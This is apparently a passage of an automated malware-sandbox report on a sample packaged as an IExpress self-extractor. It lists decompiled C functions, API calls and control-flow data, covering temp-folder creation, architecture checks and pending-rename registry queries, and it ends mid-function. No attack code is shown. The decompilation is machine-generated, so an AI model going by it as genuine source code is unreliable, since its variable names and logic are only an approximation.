                                                                                                                                                                                                      0x003e4578
                                                                                                                                                                                                      0x003e457c
                                                                                                                                                                                                      0x003e45cb
                                                                                                                                                                                                      0x003e4607
                                                                                                                                                                                                      0x003e4607
                                                                                                                                                                                                      0x003e460d
                                                                                                                                                                                                      0x003e4613
                                                                                                                                                                                                      0x003e4617
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e461d
                                                                                                                                                                                                      0x003e4623
                                                                                                                                                                                                      0x003e4626
                                                                                                                                                                                                      0x003e4628
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e4628
                                                                                                                                                                                                      0x003e45cd
                                                                                                                                                                                                      0x003e45cd
                                                                                                                                                                                                      0x003e45cf
                                                                                                                                                                                                      0x003e45cf
                                                                                                                                                                                                      0x003e45d2
                                                                                                                                                                                                      0x003e45d2
                                                                                                                                                                                                      0x003e45d4
                                                                                                                                                                                                      0x003e45d5
                                                                                                                                                                                                      0x003e45db
                                                                                                                                                                                                      0x003e45de
                                                                                                                                                                                                      0x003e45e3
                                                                                                                                                                                                      0x003e45e9
                                                                                                                                                                                                      0x003e45ed
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e45f3
                                                                                                                                                                                                      0x003e45fd
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e4602
                                                                                                                                                                                                      0x003e45ed
                                                                                                                                                                                                      0x003e457e
                                                                                                                                                                                                      0x003e457e
                                                                                                                                                                                                      0x003e4580
                                                                                                                                                                                                      0x003e4580
                                                                                                                                                                                                      0x003e4583
                                                                                                                                                                                                      0x003e4583
                                                                                                                                                                                                      0x003e4585
                                                                                                                                                                                                      0x003e4586
                                                                                                                                                                                                      0x003e458a
                                                                                                                                                                                                      0x003e458c
                                                                                                                                                                                                      0x003e458f
                                                                                                                                                                                                      0x003e458f
                                                                                                                                                                                                      0x003e4591
                                                                                                                                                                                                      0x003e4592
                                                                                                                                                                                                      0x003e459b
                                                                                                                                                                                                      0x003e459e
                                                                                                                                                                                                      0x003e45a3
                                                                                                                                                                                                      0x003e45a9
                                                                                                                                                                                                      0x003e45ad
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e45af
                                                                                                                                                                                                      0x003e45af
                                                                                                                                                                                                      0x003e45bf
                                                                                                                                                                                                      0x003e462d
                                                                                                                                                                                                      0x003e4630
                                                                                                                                                                                                      0x003e463d
                                                                                                                                                                                                      0x003e464e
                                                                                                                                                                                                      0x003e464e
                                                                                                                                                                                                      0x003e463f
                                                                                                                                                                                                      0x003e4640
                                                                                                                                                                                                      0x003e4647
                                                                                                                                                                                                      0x003e464c
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e464c
                                                                                                                                                                                                      0x003e4666
                                                                                                                                                                                                      0x003e466d
                                                                                                                                                                                                      0x003e466f
                                                                                                                                                                                                      0x003e4675
                                                                                                                                                                                                      0x003e4675
                                                                                                                                                                                                      0x003e45ad
                                                                                                                                                                                                      0x003e4527
                                                                                                                                                                                                      0x003e452e
                                                                                                                                                                                                      0x003e453f
                                                                                                                                                                                                      0x003e453f
                                                                                                                                                                                                      0x003e4530
                                                                                                                                                                                                      0x003e4531
                                                                                                                                                                                                      0x003e4538
                                                                                                                                                                                                      0x003e453d
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e453d
                                                                                                                                                                                                      0x003e4554
                                                                                                                                                                                                      0x003e455a
                                                                                                                                                                                                      0x003e455a
                                                                                                                                                                                                      0x003e455a
                                                                                                                                                                                                      0x003e4525
                                                                                                                                                                                                      0x003e468c

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 003E4518
                                                                                                                                                                                                      • MessageBoxA.USER32(?,?,cent,00010010), ref: 003E4554
                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,00000065), ref: 003E45A3
                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,00000065), ref: 003E45E3
                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,00000002), ref: 003E460D
                                                                                                                                                                                                      • MessageBeep.USER32(00000000), ref: 003E4630
                                                                                                                                                                                                      • MessageBoxA.USER32(?,00000000,cent,00000000), ref: 003E4666
                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000), ref: 003E466F
                                                                                                                                                                                                        • Part of subcall function 003E681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 003E686E
                                                                                                                                                                                                        • Part of subcall function 003E681F: GetSystemMetrics.USER32(0000004A), ref: 003E68A7
                                                                                                                                                                                                        • Part of subcall function 003E681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 003E68CC
                                                                                                                                                                                                        • Part of subcall function 003E681F: RegQueryValueExA.ADVAPI32(?,003E1140,00000000,?,?,0000000C), ref: 003E68F4
                                                                                                                                                                                                        • Part of subcall function 003E681F: RegCloseKey.ADVAPI32(?), ref: 003E6902
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
                                                                                                                                                                                                      • String ID: LoadString() Error. Could not load string resource.$cent
                                                                                                                                                                                                      • API String ID: 3244514340-2605220145
                                                                                                                                                                                                      • Opcode ID: 844b3ced1195852392029cd994fad762035e0c8281333e5c05513c960c3345f9
                                                                                                                                                                                                      • Instruction ID: b9fefe75a985bde65f4cb6ec095c02f900fc4c9cda46442f03540f64be2dde18
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 844b3ced1195852392029cd994fad762035e0c8281333e5c05513c960c3345f9
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5D51E8719001A99BDF239F29CC48BAA7B69EF4A340F154795FD09AB2C1DB31DD05CB50
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      C-Code - Quality: 95%
                                                                                                                                                                                                      			E003E53A1(CHAR* __ecx, CHAR* __edx) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t5;
                                                                                                                                                                                                      				long _t13;
                                                                                                                                                                                                      				int _t14;
                                                                                                                                                                                                      				CHAR* _t20;
                                                                                                                                                                                                      				int _t29;
                                                                                                                                                                                                      				int _t30;
                                                                                                                                                                                                      				CHAR* _t32;
                                                                                                                                                                                                      				signed int _t33;
                                                                                                                                                                                                      				void* _t34;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t5 =  *0x3e8004; // 0x59d037e4
                                                                                                                                                                                                      				_v8 = _t5 ^ _t33;
                                                                                                                                                                                                      				_t32 = __edx;
                                                                                                                                                                                                      				_t20 = __ecx;
                                                                                                                                                                                                      				_t29 = 0;
                                                                                                                                                                                                      				while(1) {
                                                                                                                                                                                                      					E003E171E( &_v268, 0x104, "IXP%03d.TMP", _t29);
                                                                                                                                                                                                      					_t34 = _t34 + 0x10;
                                                                                                                                                                                                      					_t29 = _t29 + 1;
                                                                                                                                                                                                      					E003E1680(_t32, 0x104, _t20);
                                                                                                                                                                                                      					E003E658A(_t32, 0x104,  &_v268); // executed
                                                                                                                                                                                                      					RemoveDirectoryA(_t32); // executed
                                                                                                                                                                                                      					_t13 = GetFileAttributesA(_t32); // executed
                                                                                                                                                                                                      					if(_t13 == 0xffffffff) {
                                                                                                                                                                                                      						break;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					if(_t29 < 0x190) {
                                                                                                                                                                                                      						continue;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					L3:
                                                                                                                                                                                                      					_t30 = 0;
                                                                                                                                                                                                      					if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
                                                                                                                                                                                                      						_t30 = 1;
                                                                                                                                                                                                      						DeleteFileA(_t32);
                                                                                                                                                                                                      						CreateDirectoryA(_t32, 0);
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					L5:
                                                                                                                                                                                                      					return E003E6CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t14 = CreateDirectoryA(_t32, 0); // executed
                                                                                                                                                                                                      				if(_t14 == 0) {
                                                                                                                                                                                                      					goto L3;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t30 = 1;
                                                                                                                                                                                                      				 *0x3e8a20 = 1;
                                                                                                                                                                                                      				goto L5;
                                                                                                                                                                                                      			}

















                                                                                                                                                                                                      0x003e53ac
                                                                                                                                                                                                      0x003e53b3
                                                                                                                                                                                                      0x003e53b9
                                                                                                                                                                                                      0x003e53bb
                                                                                                                                                                                                      0x003e53bd
                                                                                                                                                                                                      0x003e53bf
                                                                                                                                                                                                      0x003e53d1
                                                                                                                                                                                                      0x003e53d6
                                                                                                                                                                                                      0x003e53e0
                                                                                                                                                                                                      0x003e53e2
                                                                                                                                                                                                      0x003e53f5
                                                                                                                                                                                                      0x003e53fb
                                                                                                                                                                                                      0x003e5402
                                                                                                                                                                                                      0x003e540b
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e5413
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e5415
                                                                                                                                                                                                      0x003e5416
                                                                                                                                                                                                      0x003e5427
                                                                                                                                                                                                      0x003e542a
                                                                                                                                                                                                      0x003e542b
                                                                                                                                                                                                      0x003e5434
                                                                                                                                                                                                      0x003e5434
                                                                                                                                                                                                      0x003e543a
                                                                                                                                                                                                      0x003e544c
                                                                                                                                                                                                      0x003e544c
                                                                                                                                                                                                      0x003e5452
                                                                                                                                                                                                      0x003e545a
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e545e
                                                                                                                                                                                                      0x003e545f
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 003E171E: _vsnprintf.MSVCRT ref: 003E1750
                                                                                                                                                                                                      • RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 003E53FB
                                                                                                                                                                                                      • GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 003E5402
                                                                                                                                                                                                      • GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 003E541F
                                                                                                                                                                                                      • DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 003E542B
                                                                                                                                                                                                      • CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 003E5434
                                                                                                                                                                                                      • CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 003E5452
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$IXP$IXP%03d.TMP
                                                                                                                                                                                                      • API String ID: 1082909758-2310010875
                                                                                                                                                                                                      • Opcode ID: 394f549a41742a626ee61090cf377cd3725285a29719c3fe382df6958aaaab0a
                                                                                                                                                                                                      • Instruction ID: 78a333af42f872478b48822212549818144e577adb53772bea7051b4226d3ab0
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 394f549a41742a626ee61090cf377cd3725285a29719c3fe382df6958aaaab0a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: F61104717009A467D322AB279C89FEF366DEBD1725F000325F546DA1D0CE749D868AA1
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 522 3e5467-3e5484 523 3e551c-3e5528 call 3e1680 522->523 524 3e548a-3e5490 call 3e53a1 522->524 527 3e552d-3e5539 call 3e58c8 523->527 528 3e5495-3e5497 524->528 537 3e554d-3e5552 527->537 538 3e553b-3e5545 CreateDirectoryA 527->538 530 3e549d-3e54c0 call 3e1781 528->530 531 3e5581-3e5583 528->531 539 3e550c-3e551a call 3e658a 530->539 540 3e54c2-3e54d8 GetSystemInfo 530->540 534 3e558d-3e559d call 3e6ce0 531->534 544 3e5554-3e5557 call 3e597d 537->544 545 3e5585-3e558b 537->545 542 3e5577-3e557c call 3e6285 538->542 543 3e5547 538->543 539->527 546 3e54fe 540->546 547 3e54da-3e54dd 540->547 542->531 543->537 553 3e555c-3e555e 544->553 545->534 554 3e5503-3e5507 call 3e658a 546->554 551 3e54df-3e54e2 547->551 552 3e54f7-3e54fc 547->552 557 3e54e4-3e54e7 551->557 558 3e54f0-3e54f5 551->558 552->554 553->545 559 3e5560-3e5566 553->559 554->539 557->539 561 3e54e9-3e54ee 557->561 558->554 559->531 562 3e5568-3e5575 RemoveDirectoryA 559->562 561->554 562->531
                                                                                                                                                                                                      C-Code - Quality: 75%
                                                                                                                                                                                                      			E003E5467(CHAR* __ecx, void* __edx, char* _a4) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				struct _SYSTEM_INFO _v304;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t10;
                                                                                                                                                                                                      				void* _t13;
                                                                                                                                                                                                      				intOrPtr _t14;
                                                                                                                                                                                                      				void* _t16;
                                                                                                                                                                                                      				void* _t20;
                                                                                                                                                                                                      				signed int _t26;
                                                                                                                                                                                                      				void* _t28;
                                                                                                                                                                                                      				void* _t29;
                                                                                                                                                                                                      				CHAR* _t48;
                                                                                                                                                                                                      				signed int _t49;
                                                                                                                                                                                                      				intOrPtr _t61;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t10 =  *0x3e8004; // 0x59d037e4
                                                                                                                                                                                                      				_v8 = _t10 ^ _t49;
                                                                                                                                                                                                      				_push(__ecx);
                                                                                                                                                                                                      				if(__edx == 0) {
                                                                                                                                                                                                      					_t48 = 0x3e91e4;
                                                                                                                                                                                                      					_t42 = 0x104;
                                                                                                                                                                                                      					E003E1680(0x3e91e4, 0x104);
                                                                                                                                                                                                      					L14:
                                                                                                                                                                                                      					_t13 = E003E58C8(_t48); // executed
                                                                                                                                                                                                      					if(_t13 != 0) {
                                                                                                                                                                                                      						L17:
                                                                                                                                                                                                      						_t42 = _a4;
                                                                                                                                                                                                      						if(_a4 == 0) {
                                                                                                                                                                                                      							L23:
                                                                                                                                                                                                      							 *0x3e9124 = 0;
                                                                                                                                                                                                      							_t14 = 1;
                                                                                                                                                                                                      							L24:
                                                                                                                                                                                                      							return E003E6CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t16 = E003E597D(_t48, _t42, 1, 0); // executed
                                                                                                                                                                                                      						if(_t16 != 0) {
                                                                                                                                                                                                      							goto L23;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t61 =  *0x3e8a20; // 0x0
                                                                                                                                                                                                      						if(_t61 != 0) {
                                                                                                                                                                                                      							 *0x3e8a20 = 0;
                                                                                                                                                                                                      							RemoveDirectoryA(_t48);
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						L22:
                                                                                                                                                                                                      						_t14 = 0;
                                                                                                                                                                                                      						goto L24;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					if(CreateDirectoryA(_t48, 0) == 0) {
                                                                                                                                                                                                      						 *0x3e9124 = E003E6285();
                                                                                                                                                                                                      						goto L22;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					 *0x3e8a20 = 1;
                                                                                                                                                                                                      					goto L17;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t42 =  &_v268;
                                                                                                                                                                                                      				_t20 = E003E53A1(__ecx,  &_v268); // executed
                                                                                                                                                                                                      				if(_t20 == 0) {
                                                                                                                                                                                                      					goto L22;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_push(__ecx);
                                                                                                                                                                                                      				_t48 = 0x3e91e4;
                                                                                                                                                                                                      				E003E1781(0x3e91e4, 0x104, __ecx,  &_v268);
                                                                                                                                                                                                      				if(( *0x3e9a34 & 0x00000020) == 0) {
                                                                                                                                                                                                      					L12:
                                                                                                                                                                                                      					_t42 = 0x104;
                                                                                                                                                                                                      					E003E658A(_t48, 0x104, 0x3e1140);
                                                                                                                                                                                                      					goto L14;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				GetSystemInfo( &_v304);
                                                                                                                                                                                                      				_t26 = _v304.dwOemId & 0x0000ffff;
                                                                                                                                                                                                      				if(_t26 == 0) {
                                                                                                                                                                                                      					_push("i386");
                                                                                                                                                                                                      					L11:
                                                                                                                                                                                                      					E003E658A(_t48, 0x104);
                                                                                                                                                                                                      					goto L12;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t28 = _t26 - 1;
                                                                                                                                                                                                      				if(_t28 == 0) {
                                                                                                                                                                                                      					_push("mips");
                                                                                                                                                                                                      					goto L11;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t29 = _t28 - 1;
                                                                                                                                                                                                      				if(_t29 == 0) {
                                                                                                                                                                                                      					_push("alpha");
                                                                                                                                                                                                      					goto L11;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if(_t29 != 1) {
                                                                                                                                                                                                      					goto L12;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_push("ppc");
                                                                                                                                                                                                      				goto L11;
                                                                                                                                                                                                      			}




















                                                                                                                                                                                                      0x003e5472
                                                                                                                                                                                                      0x003e5479
                                                                                                                                                                                                      0x003e5481
                                                                                                                                                                                                      0x003e5484
                                                                                                                                                                                                      0x003e551c
                                                                                                                                                                                                      0x003e5521
                                                                                                                                                                                                      0x003e5528
                                                                                                                                                                                                      0x003e552d
                                                                                                                                                                                                      0x003e552f
                                                                                                                                                                                                      0x003e5539
                                                                                                                                                                                                      0x003e554d
                                                                                                                                                                                                      0x003e554d
                                                                                                                                                                                                      0x003e5552
                                                                                                                                                                                                      0x003e5585
                                                                                                                                                                                                      0x003e5585
                                                                                                                                                                                                      0x003e558b
                                                                                                                                                                                                      0x003e558d
                                                                                                                                                                                                      0x003e559d
                                                                                                                                                                                                      0x003e559d
                                                                                                                                                                                                      0x003e5557
                                                                                                                                                                                                      0x003e555e
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e5560
                                                                                                                                                                                                      0x003e5566
                                                                                                                                                                                                      0x003e5569
                                                                                                                                                                                                      0x003e556f
                                                                                                                                                                                                      0x003e556f
                                                                                                                                                                                                      0x003e5581
                                                                                                                                                                                                      0x003e5581
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e5581
                                                                                                                                                                                                      0x003e5545
                                                                                                                                                                                                      0x003e557c
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e557c
                                                                                                                                                                                                      0x003e5547
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e5547
                                                                                                                                                                                                      0x003e548a
                                                                                                                                                                                                      0x003e5490
                                                                                                                                                                                                      0x003e5497
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e549d
                                                                                                                                                                                                      0x003e54ab
                                                                                                                                                                                                      0x003e54b4
                                                                                                                                                                                                      0x003e54c0
                                                                                                                                                                                                      0x003e550c
                                                                                                                                                                                                      0x003e5511
                                                                                                                                                                                                      0x003e5515
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e5515
                                                                                                                                                                                                      0x003e54c9
                                                                                                                                                                                                      0x003e54d6
                                                                                                                                                                                                      0x003e54d8
                                                                                                                                                                                                      0x003e54fe
                                                                                                                                                                                                      0x003e5503
                                                                                                                                                                                                      0x003e5507
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e5507
                                                                                                                                                                                                      0x003e54da
                                                                                                                                                                                                      0x003e54dd
                                                                                                                                                                                                      0x003e54f7
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e54f7
                                                                                                                                                                                                      0x003e54df
                                                                                                                                                                                                      0x003e54e2
                                                                                                                                                                                                      0x003e54f0
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e54f0
                                                                                                                                                                                                      0x003e54e7
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e54e9
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 003E54C9
                                                                                                                                                                                                      • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 003E553D
                                                                                                                                                                                                      • RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 003E556F
                                                                                                                                                                                                        • Part of subcall function 003E53A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 003E53FB
                                                                                                                                                                                                        • Part of subcall function 003E53A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 003E5402
                                                                                                                                                                                                        • Part of subcall function 003E53A1: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 003E541F
                                                                                                                                                                                                        • Part of subcall function 003E53A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 003E542B
                                                                                                                                                                                                        • Part of subcall function 003E53A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 003E5434
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$alpha$i386$mips$ppc
                                                                                                                                                                                                      • API String ID: 1979080616-1000730752
                                                                                                                                                                                                      • Opcode ID: 27ac9036613c419f8361d9b075e7bb1ae1b0109f66c05b2d2336c8f0d6d83b46
                                                                                                                                                                                                      • Instruction ID: cc5586c8a62438b7ab4ff459cf883135d009677e55ba9aa40426871819222028
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 27ac9036613c419f8361d9b075e7bb1ae1b0109f66c05b2d2336c8f0d6d83b46
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2631EA71B00AF45BCB239B279C456FE779EAB92348F15033AE407DA6D0DB708E418A91
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 563 3e256d-3e257d 564 3e2622-3e2627 call 3e24e0 563->564 565 3e2583-3e2589 563->565 569 3e2629-3e262f 564->569 566 3e258b 565->566 567 3e25e8-3e2607 RegOpenKeyExA 565->567 566->569 570 3e2591-3e2595 566->570 571 3e2609-3e2620 RegQueryInfoKeyA 567->571 572 3e25e3-3e25e6 567->572 570->569 574 3e259b-3e25ba RegOpenKeyExA 570->574 575 3e25d1-3e25dd RegCloseKey 571->575 572->569 574->572 576 3e25bc-3e25cb RegQueryValueExA 574->576 575->572 576->575
                                                                                                                                                                                                      C-Code - Quality: 86%
                                                                                                                                                                                                      			E003E256D(signed int __ecx) {
                                                                                                                                                                                                      				int _v8;
                                                                                                                                                                                                      				void* _v12;
                                                                                                                                                                                                      				signed int _t13;
                                                                                                                                                                                                      				signed int _t19;
                                                                                                                                                                                                      				long _t24;
                                                                                                                                                                                                      				void* _t26;
                                                                                                                                                                                                      				int _t31;
                                                                                                                                                                                                      				void* _t34;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_push(__ecx);
                                                                                                                                                                                                      				_push(__ecx);
                                                                                                                                                                                                      				_t13 = __ecx & 0x0000ffff;
                                                                                                                                                                                                      				_t31 = 0;
                                                                                                                                                                                                      				if(_t13 == 0) {
                                                                                                                                                                                                      					_t31 = E003E24E0(_t26);
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t34 = _t13 - 1;
                                                                                                                                                                                                      					if(_t34 == 0) {
                                                                                                                                                                                                      						_v8 = 0;
                                                                                                                                                                                                      						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
                                                                                                                                                                                                      							goto L7;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
                                                                                                                                                                                                      							goto L6;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						L12:
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						if(_t34 > 0 && __ecx <= 3) {
                                                                                                                                                                                                      							_v8 = 0;
                                                                                                                                                                                                      							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
                                                                                                                                                                                                      							if(_t24 == 0) {
                                                                                                                                                                                                      								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
                                                                                                                                                                                                      								L6:
                                                                                                                                                                                                      								asm("sbb eax, eax");
